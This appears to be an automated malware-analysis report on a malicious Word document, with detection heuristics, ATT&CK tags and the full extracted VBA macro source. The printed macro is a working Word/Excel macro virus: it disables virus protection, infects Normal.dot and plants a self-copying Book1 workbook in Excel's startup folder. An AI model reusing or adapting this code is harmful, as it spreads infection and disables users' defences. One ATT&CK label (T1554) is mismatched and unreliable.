MALICIOUS
308
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1547.001 Registry Run Keys / Startup Folder
T1554 Inhibit System Recovery
The sample contains VBA macros, including a Document_Open macro that attempts to disable virus protection and inject its code into the Normal.dot template. This suggests an attempt to achieve persistence by ensuring the malicious code runs with subsequent Word document openings. The script also attempts to interact with Excel, though its exact purpose in that context is unclear.
Heuristics 7
-
ClamAV: Heuristics.Macro.DisableVirusProtection-6136181-1 critical CLAMAV_DETECTIONClamAV detected this file as malware: Heuristics.Macro.DisableVirusProtection-6136181-1
-
Reference to Windows Script Host high SC_STR_WSCRIPTReference to Windows Script Host
-
VBA macros detected medium 4 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
CreateObject call high OLE_VBA_CREATEOBJCreateObject callMatched line in script
' Set WordObj = GetObject(, "Word.Application") ' If WordObj = "" Then Set WordObj = CreateObject("Word.Application"):FlagUnload = True ' Set NT = WordObj.NormalTemplate.VBProject.VBComponents(1).CodeModule -
GetObject call high OLE_VBA_GETOBJGetObject callMatched line in script
If IsObject(WScript) Then ' Set WordObj = GetObject(, "Word.Application") ' If WordObj = "" Then Set WordObj = CreateObject("Word.Application"):FlagUnload = True -
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
Document_Open macro low OLE_VBA_DOCOPENDocument_Open macroMatched line in script
End Sub Private Sub Document_Open() On Error Resume Next
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 3896 bytes |
SHA-256: af0d566fb642c2adb83de4e033c2779c31674e2b230429bf046513e333c13018 |
|||
|
Detection
ClamAV:
Win.Trojan.Insert-9
Obfuscation or payload:
unlikely
|
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "0{00020906-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Sub Start()
On Error Resume Next
If IsObject(WScript) Then
' Set WordObj = GetObject(, "Word.Application")
' If WordObj = "" Then Set WordObj = CreateObject("Word.Application"):FlagUnload = True
' Set NT = WordObj.NormalTemplate.VBProject.VBComponents(1).CodeModule
' NT.DeleteLines 1, NT.CountOfLines: NT.AddFromFile (WScript.ScriptFullName)
' if FlagUnload = True then Wordobj.quit
' Set NT = Nothing: Set WordObj = Nothing
Set xlApp = CreateObject("Excel.Application")
Set FSO = CreateObject("Scripting.FileSystemObject")
MsgBox "1"
If Not FSO.FileExists(xlApp.Application.StartupPath + "\Book1.") Then
MsgBox "2"
Set Book1Obj = xlApp.Workbooks.Add: Book1Obj.VBProject.VBComponents("ThisWorkbook").CodeModule.AddFromFile (WScript.ScriptFullName)
MsgBox "3"
Book1Obj.SaveAs xlApp.Application.StartupPath & "\Book1."
MsgBox "4"
End If
xlApp.Quit: Set FSO = Nothing
End If
MsgBox "@"
End Sub
Private Sub Document_Open()
On Error Resume Next
Application.Options.VirusProtection = False: Application.Options.SaveNormalPrompt = False: Options.ConfirmConversions = False
Set AD = Application.ActiveDocument.VBProject.VBComponents(1).CodeModule: Set NT = Application.NormalTemplate.VBProject.VBComponents(1).CodeModule
If InStr(NT.Lines(1, 1), "***") = 0 Then
NT.InsertLines 1, AD.Lines(1, AD.CountOfLines)
ElseIf InStr(AD.Lines(1, 1), "***") = 0 Then
AD.InsertLines 1, NT.Lines(1, NT.CountOfLines)
End If
Set xlApp = CreateObject("Excel.Application")
System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\8.0\Excel\Microsoft Excel", "Options6") = ""
System.PrivateProfileString("", "HKEY_LOCAL_MACHINE\Software\Microsoft\Office\8.0\New User Settings\Excel\Microsoft Excel", "Options6") = ""
System.PrivateProfileString("", "HKEY_USERS\.Default\Software\Microsoft\Office\8.0\Excel\Microsoft Excel", "Options6") = ""
Set FSO = CreateObject("Scripting.FileSystemObject")
If Not FSO.FileExists(xlApp.Application.StartupPath + "\Book1.") Then
Set Book1Obj = xlApp.Workbooks.Add: Book1Obj.VBProject.VBComponents("ThisWorkbook").CodeModule.InsertLines 1, NT.Lines(1, NT.CountOfLines)
Book1Obj.SaveAs xlApp.Application.StartupPath & "\Book1."
End If
xlApp.Quit: Set FSO = Nothing
End Sub
Private Sub Workbook_Deactivate()
On Error Resume Next
Set AW = ActiveWorkbook.VBProject.VBComponents("ThisWorkbook").CodeModule
Set TW = ThisWorkbook.VBProject.VBComponents("ThisWorkbook").CodeModule
Set WordObj = GetObject(, "Word.Application")
If WordObj = "" Then Set WordObj = CreateObject("Word.Application"): FlagUnload = True
Set NT = WordObj.NormalTemplate.VBProject.VBComponents(1).CodeModule
NT.DeleteLines 1, NT.CountOfLines: NT.InsertLines 1, TW.Lines(1, TW.CountOfLines)
If FlagUnload = True Then WordObj.Quit
Set NT = Nothing: Set WordObj = Nothing
Set xlApp = CreateObject("Excel.Application")
Set FSO = CreateObject("Scripting.FileSystemObject")
If Not FSO.FileExists(xlApp.Application.StartupPath + "\Book1.") Then
Set Book1Obj = xlApp.Workbooks.Add
Book1Obj.VBProject.VBComponents("ThisWorkbook").CodeModule.InsertLines 1, TW.Lines(1, TW.CountOfLines)
Book1Obj.SaveAs Application.StartupPath & "\Book1.", xlNormal, , , , , , , False
xlApp.Quit: Set FSO = Nothing
End If
If InStr(AW.Lines(1, 1), "***") = 0 Then AW.InsertLines 1, TW.Lines(1, TW.CountOfLines)
End Sub
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.